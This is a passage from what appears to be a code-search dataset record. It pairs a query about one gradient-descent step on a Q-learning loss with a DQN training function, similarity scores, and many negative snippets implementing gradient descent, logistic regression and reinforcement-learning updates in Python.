Update parameters when learning\n if self.epsilon > 0.:\n self.epsilon -= 0.01\n\n return self.epsilon", "def learn(self):\r\n last_experience = self.memory[-1]\r\n Q_target = np.zeros(self.action_size)\r\n Q_target[last_experience[1]] = last_experience[2]\r\n self.model.fit(last_experience[0], Q_target[None,:], epochs=5, verbose=0)\r\n minibatch = random.sample(self.memory, self.minibatch_size)\r\n for obs, action, reward, next_obs, done in minibatch:\r\n Q_target = np.zeros(self.action_size)\r\n if done:\r\n Q_target[action] = reward\r\n if not done:\r\n Q_target[action] = reward + self.gamma*np.amax(self.model.predict(next_obs)[0])\r\n self.model.fit(obs, Q_target[None,:], epochs=1, verbose=0)\r\n if (self.epsilon > self.epsilon_min):\r\n self.epsilon *= self.epsilon_decay", "def compute_cost(self,X, y):\r\n num_examples = np.shape(X)[0]\r\n z = np.dot(X,self.theta) + self.bias\r\n exp_z = np.exp(z)\r\n softmax_scores = exp_z / np.sum(exp_z, axis=1, keepdims=True)\r\n \r\n one_hot_y = np.zeros((num_examples,np.max(y)+1))\r\n logloss = np.zeros((num_examples,)) \r\n for i in range(np.shape(X)[0]):\r\n one_hot_y[i,y[i]] = 1\r\n logloss[i] = -np.sum(np.log(softmax_scores[i,:]) * one_hot_y[i,:])\r\n data_loss = np.sum(logloss)\r\n return 1./num_examples * data_loss", "def prediction_b(self):\r\n return self._prediction_b", "def get_targets(self, states, j):\n a = self.get_optimal_action(states, j)\n a = np.expand_dims(a, axis=1)*1\n return {'gt_action': a}", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n # print \"getQValue\"\n features = self.featExtractor.getFeatures(state, self.index)#.values()\n #weights = self.weights.values()\n #dotProduct = reduce( (lambda x, y: x*y), map( (lambda x, y: x+y), self.weights, features))\n #return dotProduct\n score = 0\n for key in features.keys():\n score += features[key]*self.weights[key]\n return score", "def weighted_mv(K_train, K_val, alphas, y_train, y_val, K_test, gamma= 1/2 ):\n errors = []\n y_tr_pred = np.zeros(y_train.shape[0])\n y_val_pred = np.zeros(y_val.shape[0])\n y_te_pred = np.zeros(1000)\n \n for i in range(len(K_train)):\n \n y_tr_i= K_train[i] @ alphas[i]\n y_val_i= K_val[i] @ alphas[i]\n \n err = error(y_train, y_tr_i)\n if err == 0:\n err = 10\n else:\n err = gamma * np.log((1-err)/err)\n \n errors += [err]\n \n y_tr_pred += err * y_tr_i\n y_val_pred += err * y_val_i\n y_te_pred += err * (K_test[i] @ alphas[i])\n \n print(\"Assigned Weights : \", errors)\n print(f\"Training score : {1 - error(y_train, y_tr_pred)}\")\n print(f\"Validation score : {1 - error(y_val, y_val_pred)}\")\n return(y_te_pred)", "def _optimize_model(self):\n # Check that there is enough plays in self.experiences\n if len(self.memory) < self.batch_size:\n return 0\n\n # Select self.batch_size random experience\n transitions = random.sample(self.memory, self.batch_size)\n batch = Transition(*zip(*transitions))\n\n state_batch = torch.cat(batch.state)\n action_batch = torch.cat(batch.action)\n next_state_batch = torch.cat(batch.next_state)\n reward_batch = torch.cat(batch.reward)\n done_batch = torch.cat(batch.done)\n\n # Compute Q(s, a) for all state\n q_values = self.policy_net(state_batch).gather(1, action_batch)\n\n # Compute Q(s_{t+1}) for all next_state\n next_q_values = torch.zeros(self.batch_size, device=device)\n with torch.no_grad():\n next_q_values[~done_batch] = self.target_net(\n next_state_batch[~done_batch]).max(1)[0].detach()\n\n # Compute expected Q-value\n expected_q_values = (next_q_values * self.gamma) + reward_batch\n\n 
# Compute loss\n loss = F.mse_loss(q_values, expected_q_values.unsqueeze(1))\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return loss.item()" ]
[ "0.6133086", "0.59240603", "0.59210104", "0.58679605", "0.586299", "0.5832981", "0.58184266", "0.58139116", "0.58036226", "0.5798045", "0.5787385", "0.5786582", "0.5784244", "0.57797366", "0.5778133", "0.57767266", "0.57760173", "0.5755751", "0.57456607", "0.5729801", "0.57243717", "0.5693466", "0.56906044", "0.5680105", "0.567885", "0.56759185", "0.56671196", "0.5666579", "0.56520826", "0.5650481", "0.56414515", "0.56392795", "0.56283087", "0.5624142", "0.56177735", "0.56054276", "0.56020284", "0.55910796", "0.55827254", "0.5563582", "0.55581164", "0.555128", "0.55471987", "0.55407315", "0.5540507", "0.5525057", "0.55233073", "0.5522592", "0.5517754", "0.55123144", "0.55094266", "0.5504891", "0.54895663", "0.54824233", "0.5481208", "0.5477058", "0.54769725", "0.5476637", "0.54761875", "0.5463349", "0.5462289", "0.5455556", "0.54541355", "0.5441168", "0.5435217", "0.54340124", "0.543063", "0.5429943", "0.54273576", "0.542374", "0.5423282", "0.54193395", "0.54155946", "0.54086155", "0.5406157", "0.540339", "0.53989863", "0.5397723", "0.5396894", "0.5391779", "0.53902686", "0.5387504", "0.53870076", "0.538623", "0.5386046", "0.5386046", "0.53840536", "0.5379638", "0.53781515", "0.53780913", "0.5378034", "0.5371724", "0.53630066", "0.53619385", "0.535553", "0.53542304", "0.5351978", "0.5351417", "0.53506124", "0.5349746" ]
0.59281206
1
Perform one step of gradient descent on (yj - Q(phi, aj, w))^2
def one_step_gd(self, batch):
    # get target values yj
    targets = self.get_target(batch)
    phi_input = np.vstack(batch[0])
    masks = self.get_masks(batch[1])
    dummy_targets = targets.max(axis=1)
    X = [phi_input, targets, masks]
    Y = [dummy_targets, targets]
    # update main network with one step of gradient descent
    # self.Qmodel.fit(X, Y, batch_size=len(X))
    # pdb.set_trace()
    metrics = self.train_model.train_on_batch(X, Y)
    # every fixed number of steps, update target network
    self.c_count += 1
    # print(self.c_count, self.c)
    if self.c_count == self.c:
        # if self.verbose:
        #     print('* Target network updated')
        # update target network to be equal the main network
        self.update_target_network()
        # reset counter
        self.c_count = 0
    return metrics[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def learning_by_gradient_descent(y, tx, w, gamma):\n loss = calculate_loss(y,tx,w)\n grad = calculate_gradient(y,tx,w)\n w_new = w - gamma*grad\n #grad is for debugging purpose\n return loss, w_new,grad", "def learning_by_gradient_descent(y, tx, w, gamma):\n loss = calculate_loss(y,tx,w)\n grad = calculate_gradient(y,tx,w)\n w = w-gamma*grad\n return w, loss", "def learning_by_gradient_descent(y, tx, w, gamma):\n\tgrad = calculate_gradient(y, tx, w)\n\n\tw = w - gamma * grad\n\treturn w", "def grad_j(self,w,j):\n g = 0\n for i in range(len(self.x)):\n # Each example contributes -sigma(-y_i * x_i.w) * y_j x_ij\n g -= sigmoid(-self.y[i] * np.dot(w, self.x[i,:])) * self.y[i] * self.x[i,j]\n #regularisation\n g += self.alpha * w[j]\n return g", "def gradient_ascent(self, w, X, y, lr):\r\n # INSERT YOUR CODE HERE\r\n #raise Exception('Function not yet implemented!')\r\n # gradient = x_j*(y-σ(wTX))\r\n return np.dot(X.T, y-self.sigmoid(np.dot(X, w)))", "def gradient_step(self):\n n = 3 #Granularity of line search\n grad = self.gradient()\n #grad = grad/np.linalg.norm(grad, 2)\n W = project(self.W[-1] + grad)\n A = np.linspace(0., 1., n+2)[1:-1]\n Objective = map(self, [(1. - a)*self.W[-1] + a*W for a in A])\n a = A[np.argmax(Objective)]\n W = (1. - a)*self.W[-1] + a*W\n obj = np.max(Objective)\n self.objective.append(obj)\n self.W.append(W)\n self.iterations += 1", "def gradient_descent(y, tx, initial_w, max_iters, gamma, compute_loss, compute_grad, verbose=False):\n \n w = initial_w.copy()\n loss = 0\n\n for n_iter in range(max_iters):\n grad = compute_grad(y, tx, w)\n loss = compute_loss(y, tx, w)\n\n w -= gamma * grad\n\n if verbose:\n print(f\"Gradient Descent ({n_iter}/{max_iters - 1}): loss={loss}, w={w}\")\n \n return w, loss", "def gradient_descent(x, y, w, max_iter, alpha = 0.001):\n \n N = y.shape[0]\n \n J_hist = np.zeros(max_iter)\n\n print(\"\\nGradient descent starts\\n\")\n\n for i in range(0, max_iter):\n \n J = np.sum( (y_hat(x, w) - y) ** 2 ) / (2 * N)\n\n J_hist[i] = J\n \n print(\"Iteration %d, J(w): %f\\n\" % (i, J))\n \n gradient = np.dot(x.T, y_hat(x, w) - y) / N \n \n w = w - alpha * gradient\n\n print(\"Gradient descent finished.\\n\")\n \n return (J_hist, w)", "def calculate_gradient(y, tx, w): \n return tx.T@(sigmoid(tx@w)-y)", "def gradientDescent(self,X, y, theta): \n # number of instances\n m = len(y)\n J_history = np.zeros((self.NUM_ITERS,1))\n for i in range(self.NUM_ITERS):\n h = self.sigmoid(X@theta)\n grad = 1 / m * X.T @ (h - y)\n theta = theta - self.ALPHA * grad \n J_history[i] = self.costFunction(theta, X, y)\n \n \n return theta, J_history", "def grad(self,w):\n # Calculate the vector -sigma(-y_i * x_i.w)\n s = -np.array([sigmoid(-yi * np.dot(xi,w)) for xi,yi in zip(self.x,self.y)])\n # Multiply it by xy\n g = np.array([np.dot(xyj,s) for xyj in self.xy.transpose()])\n # Add regularisation\n g += self.alpha*w\n return g\n #g = np.array([self.grad_j(w,j) for j in xrange(len(w))])", "def gradient_descent(x, y, theta=[[0], [0]]):\n m = y.size\n j_history = []\n for i in range(ITERATIONS):\n h = x.dot(theta)\n theta = theta - (ALPHA / m) * (x.T.dot(h - y))\n j_history.append(compute_cost(x, y, theta))\n return theta, j_history", "def gradient_step(self):\n n = 10 #Granularity of line search\n grad = self.gradient()\n W = project(self.W[-1] + grad)\n A = np.linspace(0., self.alpha, n+2)[1:-1]\n Objective = map(self, [(1. - a)*self.W[-1] + a*W for a in A])\n a = A[np.argmax(Objective)]\n W = (1. 
- a)*self.W[-1] + a*W\n obj = np.max(Objective)\n self.objective.append(obj)\n self.W.append(W)\n self.iterations += 1", "def gradientDescent(X, y, theta, alpha, num_iters):\n\n # Initialize some useful values\n J_history = []\n m = y.size # number of training examples\n\n for i in range(num_iters):\n # ====================== YOUR CODE HERE ======================\n # Instructions: Perform a single gradient step on the parameter vector\n # theta.\n #\n # Hint: While debugging, it can be useful to print out the values\n # of the cost function (computeCost) and gradient here.\n #\n # Calculate the gradient step according to the equation for theta1:\n g_step1 = (alpha / m * np.sum( (np.dot(X,theta) - y) * X[:,1]) )\n # Gradient step for theta knot:\n g_step0 = (alpha / m * np.sum( (np.dot(X,theta) - y) ) )\n \n #update theta\n theta[0] = (theta[0] - g_step0)\n theta[1] = (theta[1] - g_step1)\n \n #print([theta , g_step1, g_step0])\n\n # ============================================================\n\n # Save the cost J in every iteration\n J_history.append(computeCost(X, y, theta))\n\n return theta, J_history", "def calculate_gradient(y, tx, w):\n\n\tret = tx.T.dot(sigmoid(np.dot(tx, w)) - y)\n\treturn ret", "def gradient(theta, X, y, learning_rate):\n m = len(y)\n\n theta = theta.reshape((-1,1))\n grad = np.zeros(theta.shape)\n h = sigmoid(np.dot(X, theta)) \n \n grad = np.dot((h-y).T, X)/m\n grad = grad.T\n grad[1:] += (learning_rate/m)*theta[1:]\n return grad", "def calculate_gradient(y, tx, w):\n return tx.T.dot(sigmoid(tx.dot(w))-np.reshape(y,(len(y),1)))", "def gradientFunction(theta, X, y):\n y = y[:, 0]\n m = y.shape # number of training samples\n grad = X.T.dot(sigmoid(theta.dot(X.T))-1*y)\n grad /= m\n return grad", "def run_gradient_descent_iteration(X, Y, theta, alpha, lambda_factor, temp_parameter):\n delta = sparse.coo_matrix(theta.shape).toarray()\n\n h = compute_probabilities(X, theta, temp_parameter)\n\n for j in range(delta.shape[0]):\n y = Y\n y = np.where(y != j, 0, 1)\n p = y - h[j]\n\n x = X.T * p\n x = x.T\n x = x.sum(axis=0)\n\n grad = -x / (temp_parameter * X.shape[0]) + lambda_factor * theta[j]\n\n delta[j] += grad\n\n theta -= alpha * delta\n\n return theta", "def run_gradient_descent(data,theta,alpha,num_iters):\n population = data[:,0]\n prices = data[:,1]\n x = ones(shape=(len(population),2)) #add ones for theta0 \n x[:,1] = population\n x = transpose(x)\n error_history = zeros(shape=(num_iters,1))\n \n for i in range(num_iters):\n predictions = theta.dot(x)\n errors_x1 = (predictions - prices) * x[0,:]\n errors_x2 = (predictions - prices) * x[1,:]\n theta[0][0] = theta[0][0] - alpha*(1.0/len(population))*errors_x1.sum()\n theta[0][1] = theta[0][1] - alpha*(1.0/len(population))*errors_x2.sum()\n error_history[i,0] = calculate_cost(theta,data)\n \n return theta, error_history", "def gradient_descent(data_x, data_y, parameters, learn_rate, nb_iterations):\n\n # Cost history\n cost_tracking = np.zeros(nb_iterations)\n\n for _i in range(nb_iterations):\n parameters -= learn_rate * gradient(data_x, data_y, parameters)\n # recording the cost for each iteration\n cost_tracking[_i] = cost_function(data_x, data_y, parameters)\n\n return parameters, cost_tracking", "def gradient_descent(x0,df,rate=0.1,max_iters=1000,min_step=1e-6,max_step=1e5,\n projection=None,trajectory=False,step_history=False,f=None,\n cost_history=False,feedback=False,plot_history=False):\n if feedback is True:\n print(\"gd.gradient_descent():\")\n if f is not None:\n assert callable(f)\n fx0 = f(x0)\n 
if feedback is True:\n print(f\" initial cost = {fx0:.2e}\")\n if projection is not None:\n assert callable(projection)\n project = True\n else:\n project = False\n if trajectory is True:\n xx = [x0.copy()]\n if step_history is True:\n steps = []\n if cost_history is True:\n assert callable(f)\n fx = [fx0]\n\n x = x0.copy()\n for i in range(max_iters):\n dx = -rate*df(x)\n if project is True:\n x0 = x.copy()\n x = projection(x0+dx)\n dx = x-x0\n else:\n x += dx\n if trajectory is True:\n xx.append(x.copy())\n if cost_history is True:\n fx += [f(x)]\n step_size = np.linalg.norm(dx)\n if step_history is True:\n steps += [step_size]\n if step_size < min_step or step_size > max_step:\n break\n\n results = dict()\n results['output'] = x\n if trajectory is True:\n results['trajectory'] = xx\n if cost_history is True:\n results['cost_history'] = fx\n if step_history is True:\n results['step_history'] = steps\n if plot_history is True:\n assert step_history is True or cost_history is True\n plt.figure()\n if step_history is True:\n plt.semilogy(steps,label='step size')\n if cost_history is True:\n plt.semilogy(fx,label='cost')\n plt.xlabel('iteration number')\n plt.title('Gradient Descent')\n plt.legend()\n results['figure'] = plt\n plt.show(block=False)\n \n if feedback is True:\n if f is not None:\n print(f\" final cost = {f(x):.2e}\")\n \n return results", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n\r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range (num_iterations):\r\n \r\n h = numpy.dot(features, theta)\r\n \r\n theta = theta - alpha / m * numpy.dot((h-values),features)\r\n \r\n cost = compute_cost(features, values, theta)\r\n \r\n cost_history.append(cost)\r\n\r\n return theta, pandas.Series(cost_history) # leave this line for the grader\r", "def gradientdescent(cost_func, theta, args=(), delta_func = 0):\n step = 1\n old_cost = 0\n while True:\n theta_old = theta.copy()\n cost = cost_func(theta, *args)\n delta = delta_func(theta, *args)\n theta = theta - step * delta\n if cost > old_cost and old_cost != 0:\n step = step*0.7\n if np.allclose(theta_old, theta):\n break\n old_cost = cost\n return theta", "def logit_cost_grad(self, theta, X, y):\n\n grad = np.zeros(len(theta))\n\n ### YOUR CODE HERE\n sig = utils.sigmoid(theta)\n # sig = np.subtract(sig, y)\n sig = sig - y\n grad = np.dot(X.T, sig) + 2 * self.params['lamb'] * self.regularizer[1](self.weights)\n ### END YOUR CODE\n\n return grad", "def step_maxL_gradient_descent(y, tx, w, gamma):\n loss=loss_maxL(y, tx, w)\n grad=calculate_maxL_gradient(y,tx,w)\n # update w by gradient\n w=w-gamma*grad\n return w, loss", "def run_steep_gradient_descent(data_x, data_y, len_data, alpha, theta):\n n = len_data\n # WE NEED TO transpose data_x into (p+1) *n ,theta is 1*(p+1)\n prod = np.dot(theta, data_x.transpose())\n\n prod -= data_y\n print(\"pro: data_x\", prod.shape, data_x.shape)\n #prod represent the loss of the hypothesis and true label\n sum_grad = np.dot(prod, data_x)\n print(\"总梯度的值:\",sum_grad.shape)\n\n # batch-gradient descent\n theta = theta -(alpha / n) * sum_grad\n return theta", "def grad_l2(w, X, y, **kwargs):\n return -1 * np.dot(X.T, y - np.dot(X, w)) / X.shape[0]", "def gradient_descent(self, X ,eta, tol,iter):\n gd=[]\n gd_x=[X]\n iteration=0\n # current_pt=X\n first_derivative=sym.diff(self.gdfunc)\n #print(first_derivative)\n x=sym.Symbol('x')\n first_derivative=sym.lambdify(x,first_derivative)\n learn_rate=eta\n \n \n prev_x=X\n new_x=prev_x 
-(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n #print(\"prev_x = \",prev_x,\" Next x = \",new_x)\n for i in range(iter):\n prev_x=new_x\n #print(prev_x)\n new_x=prev_x -(learn_rate*first_derivative(prev_x))\n gd_x.append(new_x)\n # print(\"x = \",new_x,\"Gradient =\",learn_rate*self.func(prev_x))\n if abs(self.func(new_x)) <= self.func(tol) :\n break\n iteration=iteration+1\n #print(\"Best at GD x= \",new_x)\n gd.append(gd_x)\n gd.append(new_x)\n gd.append(iteration)\n\n return gd", "def gradient_descent(x_data, starting_b, starting_w, learning_rate, num_iterations):\n\n b = starting_b\n w = starting_w\n\n for i in range(num_iterations):\n b, w = step_gradient(b, w, x_data, learning_rate)\n b_history.append(b) # stores bias approximations to plot\n w_history.append(w) # stores weight approximations to plot\n err = error(b, w, x_data)\n if err <= .6: # if the error is acceptable exit iterations loop\n print('error = % f' % err)\n break\n return [b, w]", "def gradient_descent(self, alpha, batch, weight_gradients, bias_gradients):\n self._dwg = [0] * 8\n self._dbg = [0] * 8\n self._cost = 0\n\n workers = []\n for i in range(batch[0].shape[0]-1):\n p = Process(target=self.mp_gd, args=(batch, weight_gradients, bias_gradients, i))\n workers.append(p)\n p.start()\n\n\n for p in workers:\n self._cost += self._q.get()\n\n self._dwg = list(map(add, self._dwg, self._dwgq.get()))\n self._dbg = list(map(add, self._dbg, self._dbgq.get()))\n\n p.join()\n\n for j in range(len(self._dwg)):\n weight_gradients[j] = weight_gradients[j] - alpha * self._dwg[j]\n bias_gradients[j] = bias_gradients[j] - alpha * self._dbg[j]\n cost = self._cost/len(batch)\n self._cost_history.append(cost)\n\n return weight_gradients, bias_gradients", "def costFunction(self,theta, X, y): \n m = len(y)\n h = self.sigmoid(X@theta)\n J = 1 / m * (- y.T @ self.log(h) - (1-y).T @ self.log(1-h)) \n # grad = 1/ m * X.T @ (h - y)\n return J", "def exp_grad(self, xs, *args, **kwargs):\n raise NotImplementedError", "def objective_grad(self, wb, X, y):\n N, D = X.shape\n w = wb[:-1]\n b = wb[-1]\n loss_grad = np.zeros(D+1) \n # grad wrt regularization\n loss_grad[-1] = 2 * self.reg_param * (b - self.b0) # grad_b\n loss_grad[:-1] = 2 * self.reg_param * (w - self.w0) # grad_w\n\n for i in range(N):\n tmpvar = np.exp(-1 * y[i] * (np.dot(w, X[i]) + b)) \n loss_grad[-1] += tmpvar/(1 + tmpvar) * -1 * y[i] # grad_b \n loss_grad[:-1] += tmpvar/(1 + tmpvar) * -1 * y[i] * X[i] # grad_w\n\n return loss_grad", "def gradient(theta, x, y):\n m = len(y)\n n = len(theta)\n z = theta.dot(x.T)\n grad = np.zeros(n)\n for i in xrange(m):\n grad += (g(z[i]) - y[i]) * x[i]\n return 1. 
/ m * grad", "def gradient(w, x, t):\n return 2 * np.dot(x.T, (nn(x, w) - t))", "def learning_by_penalized_gradient_descent(y, tx, w, gamma, lambda_):\n loss = calculate_loss(y, tx, w) + lambda_ * np.squeeze(w.T.dot(w))\n grad = calculate_gradient(y, tx, w) + 2 * lambda_ * w\n w = w-gamma*grad\n return w, loss", "def train_gradient_descent(self, X, y, learning_rate=0.01, n_iters=100):\r\n # Step 0: Initialize the parameters\r\n n_samples, n_features = X.shape\r\n self.weights = np.zeros(shape=(n_features,1))\r\n self.bias = 0\r\n costs = []\r\n\r\n for i in range(n_iters):\r\n # Step 1: Compute a linear combination of the input features and weights\r\n y_predict = np.dot(X, self.weights) + self.bias\r\n\r\n # Step 2: Compute cost over training set\r\n cost = (1 / n_samples) * np.sum((y_predict - y)**2)\r\n costs.append(cost)\r\n\r\n if i % 100 == 0:\r\n print(f\"Cost at iteration {i}: {cost}\")\r\n\r\n # Step 3: Compute the gradients\r\n dJ_dw = (2 / n_samples) * np.dot(X.T, (y_predict - y))\r\n dJ_db = (2 / n_samples) * np.sum((y_predict - y)) \r\n \r\n # Step 4: Update the parameters\r\n self.weights = self.weights - learning_rate * dJ_dw\r\n self.bias = self.bias - learning_rate * dJ_db\r\n\r\n return self.weights, self.bias, costs", "def sgd_step(df, alpha, prev_beta, xy_i):\n x_i, y_i = xy_i\n gradient = df(x_i, y_i, prev_beta)\n return [beta_j + alpha * df_j\n for beta_j, df_j in zip(prev_beta, gradient)]", "def log_likelihood_gradient(y, tx, w):\n return tx.T.dot(sigmoid(tx.dot(w))-y)", "def learning_by_penalized_gradient(y, tx, w, gamma, lambda_):\n\n #on test avec Newton\n\n loss,gradient,_ = penalized_logistic_regression(y,tx,w,lambda_)\n\n w = w - gamma*gradient\n return loss, w,gradient", "def costFunction(theta,X,y):\n m = X.shape[0]\n J = 0\n h = sigmoid (np.dot(X,theta))\n \n J = (1/m)* ((-np.dot(y.T,(np.log(h)))) - np.dot((1 - y).T,(np.log(1-h))))\n \n #grad = (1/m) * np.dot(X.T,(h-y))\n grad = (1/m) * np.dot((h.T - y), X).T\n \n return J, grad", "def gradient_descent(X, Y, epsilon=1e-6, l=1, step_size=1e-4, max_steps=1000):\n beta = np.zeros(X.shape[1])\n for s in range(max_steps):\n # TODO: Implement iterations.\n pass\n return beta", "def gradient_descent(initial_theta, X, y, niter, alpha, Lambda=0.0):\n theta_list = []\n cost_list = []\n\n theta = initial_theta\n for i in range(0, niter):\n theta -= alpha*gradient(theta, X, y, Lambda)\n theta_list.append(theta)\n cost_list.append(cost(theta, X, y, Lambda))\n\n return theta_list, cost_list", "def compute_gradient(y, tx, w):\n\tN = y.shape[0]\n\te = y - np.dot(tx, w)\n\n\tgradLw = -1/N * np.dot(tx.T, e)\n\treturn gradLw", "def gradient_descent(features, values, theta, alpha, num_iterations):\r\n \r\n m = len(values)\r\n cost_history = []\r\n\r\n for i in range(num_iterations):\r\n # your code here\r\n cost = compute_cost(features, values, theta)/(2.0*m)\r\n cost_history.append([cost])\r\n \r\n error = features.dot(theta) - values\r\n error = np.reshape(error,(error.shape[0], 1))\r\n errorWeighted = features*error\r\n errorSum = (np.sum(errorWeighted,0))/(m*1.0)\r\n theta = theta - alpha*errorSum \r\n \r\n return theta, pandas.Series(cost_history)", "def gradient_descent_step(self, x, y, learning_rate):\n # compute derivative of loss wrt Z\n dZ = self.derivative_loss(y, self.predict(x))\n dW = np.dot(dZ, x)\n # subtract average derivative from weights\n self.w -= learning_rate * 1.0/dW.shape[0] * dW\n if self.fit_b:\n self.b -= learning_rate * (1.0/x.shape[0] * np.sum(dZ))", "def _gradient_descent(self, X, y, epochs, 
learning_rate, batch_size):\n num_feats = X.shape[1]\n num_samples = X.shape[0]\n\n y = y.reshape(num_samples, 1)\n W = np.random.rand(num_feats, 1)\n training_loss_epochs = []\n\n for ix in range(epochs):\n shuffled_ix = (np.arange(0, len(X)))\n np.random.shuffle(shuffled_ix)\n X = X[shuffled_ix, :]\n y = y[shuffled_ix, :]\n\n for batch_ix in np.arange(0, X.shape[0], batch_size):\n dW = self._compute_gradient(W, X[batch_ix:batch_ix + batch_size], y[batch_ix:batch_ix + batch_size])\n W -= learning_rate * dW\n\n if ix % 10 == 0:\n y_pred = np.dot(X, W)\n training_loss = self.mse(y, y_pred)\n print('epoch {0} : training loss {1}'.format(ix, training_loss))\n training_loss_epochs.append(training_loss[0])\n\n self.weights = W\n self.training_loss = training_loss_epochs\n return None", "def gradient_descent(self, x, y):\n # Initialize weights vector\n self.weights = np.zeros(len(x[0]))\n\n # Storing number of training example in a variable \n n = len(x)\n\n # Initiate variables to keep track of the current and smallest loss recorded\n lowest_loss = sys.float_info.max\n current_loss = sys.float_info.max\n\n # Initiate variables to keep track of step sizes\n norm = sys.float_info.max\n smallest_norm = sys.float_info.max\n\n # Initiate list variable that stores all previous weights\n prev_weights = []\n\n # Initiate list that stores all the errors. \n errors = []\n \n # Variable to keep track of the number of iterations that returns a bigger loss than current loss\n k_loss_iteration = 1\n\n # Learning loop\n for i in range(self.max_iter):\n\n # Append current weights\n prev_weights.append(np.array(self.weights))\n \n # Minimizing Loss Function Error by adjusting weights using Gradient Descent\n self.weights += self.learning_rate * (sum([x[i] * (y[i] - self.logistic_function(self.weights.dot(x[i]))) for i in range(n)]) - 2 * self.l2 * self.weights)\n\n # Compute the error of the Cost Function and store it in a list\n current_loss = self.cost(x,y)\n\n if len(errors) > 1 and current_loss > errors[-1]:\n k_loss_iteration += 1\n else: \n k_loss_iteration = 1\n\n errors.append(current_loss)\n \n # Track smallest loss\n if current_loss < lowest_loss:\n lowest_loss = current_loss\n\n # Compute the L2 Norm of the difference between current weights and previous weights\n norm = np.linalg.norm(self.weights - prev_weights[-1])\n\n # Track smallest step size and set it as error threshold\n if norm < smallest_norm:\n smallest_norm = norm\n\n # If this L2 norm is smaller than the error_threshold it means that it converged, hence we can break. 
In other words, repeat until the step size is too small\n if self.error_threshold != None and norm < self.error_threshold:\n print(\"Converged after {} iterations!\".format(i))\n break\n\n # stop if error hasn't gone down in k iterations\n if k_loss_iteration >= 10:\n print(k_loss_iteration + \" iterations of loss not decreasing on {}th itertion.\".format(i))\n break\n\n # Log final weights\n print(\"Final norm: \" + str(norm) + \"\\nSmallest step size recorded: \" + str(smallest_norm) + \"\\nFinal error: \" + str(current_loss) + \"\\nLowest error recorded: \" + str(lowest_loss) + \"\\nNumber of epochs: \" + str(len(errors)) + \"\\nFinal weights: \" + str(self.weights))", "def gradient_descent(self, X, theta, Y, m):\n\n Z = X.dot(theta)\n H = Predict.g(Z)\n gradient = np.dot(X.T, (H - Y)) / m\n return self.alpha * gradient", "def _compute_func_grad(self, w):\n W = w.reshape((self.X.shape[1], self.Y.shape[1]))\n self.nll_, self.grad_ = calculate_gradient(self.X, self.Y, W, self.prior, self.weighted,0)", "def gradient_descent(f, df, x, sigma=0.5, epsilon=1e-8):\n pass", "def least_squares_GD(y, tx, initial_w, max_iters, gamma, verbose=False):\n return gradient_descent(y, tx, initial_w, max_iters, gamma, compute_mse, \n compute_mse_gradient, verbose=verbose)", "def compute_gradient(theta, X, y):\n m = X.shape[0]\n grad_theta = np.dot(X.transpose(), (np.dot(X, theta) - y)) / m\n #print theta, grad_theta, objective_function(theta, X, y)\n return grad_theta", "def _grad_j(q_j, A_j, b_j, b_j_norm, a_1_j, a_2_j, m):\n return (A_j.t() @ q_j / (-m)) + (b_j * (a_1_j / b_j_norm + a_2_j))", "def gradient_descend(self, X, y, state_generators, operator_programs=None,\r\n qvm=None):\r\n history_theta, history_loss, history_grad = [], [], []\r\n coeff, theta = 1.0, self.initial_theta\r\n \r\n prog_input_gen = state_generators['input']\r\n prog_output_gen = state_generators['output']\r\n prog_output_grad = state_generators['grad']\r\n \r\n n_samples = len(X)\r\n n_theta = len(theta)\r\n \r\n if qvm is None:\r\n self.qvm = api.QVMConnection()\r\n else:\r\n self.qvm = qvm\r\n \r\n # Check operators\r\n if not isinstance(operator_programs, list):\r\n operator_programs = [operator_programs]\r\n n_operators = len(operator_programs)\r\n \r\n # Check batch size\r\n if self.batch_size is None:\r\n self.batch_size = n_samples\r\n self.batch_size = min(self.batch_size, n_samples)\r\n \r\n # Loop over epochs\r\n for e in range(self.epochs): \r\n \r\n # Loop over batches\r\n batches = self.generate_batches(X, y, self.batch_size)\r\n n_batches = len(batches)\r\n for i, batch in enumerate(batches):\r\n \r\n batch_X, batch_y = batch\r\n n_samples_in_batch = len(batch_X)\r\n \r\n # Predictions\r\n batch_y_pred = np.zeros((n_samples_in_batch, n_operators))\r\n for k in range(n_samples_in_batch):\r\n prog = prog_input_gen(batch_X[k,:])\r\n prog += prog_output_gen(theta)\r\n batch_y_pred[k,:] = coeff * np.array(qvm.expectation(prog, operator_programs))\r\n if self.loss == self.loss_entropy:\r\n batch_y_pred[k,:] = np.exp(batch_y_pred[k,:]) / np.sum(np.exp(batch_y_pred[k,:]))\r\n \r\n # Comput loss\r\n loss_value = self._compute_loss(batch_y, batch_y_pred)\r\n \r\n # Display status\r\n if self.verbose:\r\n print('Epoch: {}/{} ::: Batch: {}/{} ::: Loss: {:.5f}'.format(e+1, self.epochs, i+1, n_batches, loss_value)) \r\n \r\n # Gradient\r\n if not (e == self.epochs - 1 and i == n_batches - 1):\r\n grad = np.zeros((n_samples_in_batch, n_operators, n_theta))\r\n for k in range(n_samples_in_batch):\r\n \r\n # Define input state \r\n 
prog_input = prog_input_gen(batch_X[k,:])\r\n \r\n # Caclulate gradient for each theta_j\r\n for j in range(n_theta):\r\n \r\n # Gradient +/- \r\n for sign in [1,-1]:\r\n grad_sign = np.zeros(n_operators)\r\n grad_progs = prog_output_grad(theta, j, sign)\r\n # Generally, the gradient programs could return\r\n # a program or list of programs (in case the \r\n # gradient +/- is the sum of expectations)\r\n if not isinstance(grad_progs, list):\r\n grad_progs = [grad_progs]\r\n for grad_prog in grad_progs:\r\n prog = prog_input\r\n prog += grad_prog\r\n # B_j +/- expectation\r\n grad_sign += np.array(qvm.expectation(prog, operator_programs))\r\n # Gradient = (B_j+ - B_j-) / 2\r\n grad[k, :, j] += sign / 2.0 * grad_sign\r\n \r\n # Gradient update\r\n grad_full = self._compute_grad_full(batch_y, batch_y_pred, grad)\r\n if self.loss == self.loss_mse:\r\n grad_full_coeff = -2.0 * np.mean((batch_y - batch_y_pred) * batch_y_pred)\r\n \r\n # Update theta\r\n theta -= self.learning_rate * grad_full\r\n if self.loss == self.loss_mse:\r\n coeff -= self.learning_rate * grad_full_coeff\r\n \r\n # Append to history\r\n history_loss.append(loss_value)\r\n history_theta.append(theta)\r\n 